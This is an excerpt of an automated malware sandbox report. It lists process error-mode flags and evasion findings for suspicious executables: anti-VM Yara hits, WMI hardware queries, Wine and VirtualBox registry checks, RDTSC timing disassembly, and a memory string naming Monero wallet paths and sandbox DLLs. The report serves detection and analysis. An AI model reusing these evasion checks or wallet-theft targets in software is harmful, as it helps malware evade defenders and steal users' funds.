Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FileApp.exe PID: 1340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060, type: MEMORYSTR

Found evasive API chain (may stop execution after checking locale)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetPEB, DecisionNodes, Sleep

graph_2-54808

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe

Stalling execution: Execution stalls by calling Sleep

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:28:0516:28:0516:28:0516:28:0516:28:0516:28:05DELAYS.TMP%S%SNTDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10042EC second address: 1004315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F76E5036BC0h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 101DFAF second address: 101DFB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 101DFB5 second address: 101DFBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 101DFBA second address: 101DFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5186DF9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 101E145 second address: 101E180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76E5036BB4h 0x00000008 jmp 00007F76E5036BB8h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007F76E5036BA6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 101E180 second address: 101E186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 101E47F second address: 101E483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 101E629 second address: 101E62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 101E94E second address: 101E97C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F76E5036BA6h 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F76E5036BB7h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 101E97C second address: 101E998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F76E5186DF4h 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 102145A second address: 102145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 102145E second address: 1021464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1021464 second address: 102146A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 102146A second address: EA3B51 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F76E5186DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F76E5186DF3h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jmp 00007F76E5186DF4h 0x0000001c pop eax 0x0000001d cld 0x0000001e push dword ptr [ebp+122D06E1h] 0x00000024 mov dx, di 0x00000027 call dword ptr [ebp+122D219Bh] 0x0000002d pushad 0x0000002e jnc 00007F76E5186DE7h 0x00000034 xor eax, eax 0x00000036 pushad 0x00000037 xor esi, 7ABDAB1Ch 0x0000003d mov dx, di 0x00000040 popad 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 mov dword ptr [ebp+122D220Ch], edx 0x0000004b stc 0x0000004c mov dword ptr [ebp+122D2A9Bh], eax 0x00000052 mov dword ptr [ebp+122D292Ch], edx 0x00000058 mov esi, 0000003Ch 0x0000005d clc 0x0000005e or dword ptr [ebp+122D220Ch], ebx 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 stc 0x00000069 lodsw 0x0000006b cld 0x0000006c add eax, dword ptr [esp+24h] 0x00000070 xor dword ptr [ebp+122D292Ch], esi 0x00000076 jmp 00007F76E5186DF4h 0x0000007b mov ebx, dword ptr [esp+24h] 0x0000007f mov dword ptr [ebp+122D292Ch], ecx 0x00000085 push eax 0x00000086 jbe 00007F76E5186DF8h 0x0000008c push eax 0x0000008d push edx 0x0000008e jno 00007F76E5186DE6h 0x00000094 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1021672 second address: 10216C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F76E5036BABh 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D2A4Fh] 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D30BDh], edx 0x0000001f call 00007F76E5036BA9h 0x00000024 jmp 00007F76E5036BACh 0x00000029 push eax 0x0000002a jc 00007F76E5036BB2h 0x00000030 js 00007F76E5036BACh 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10216C9 second address: 10216CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
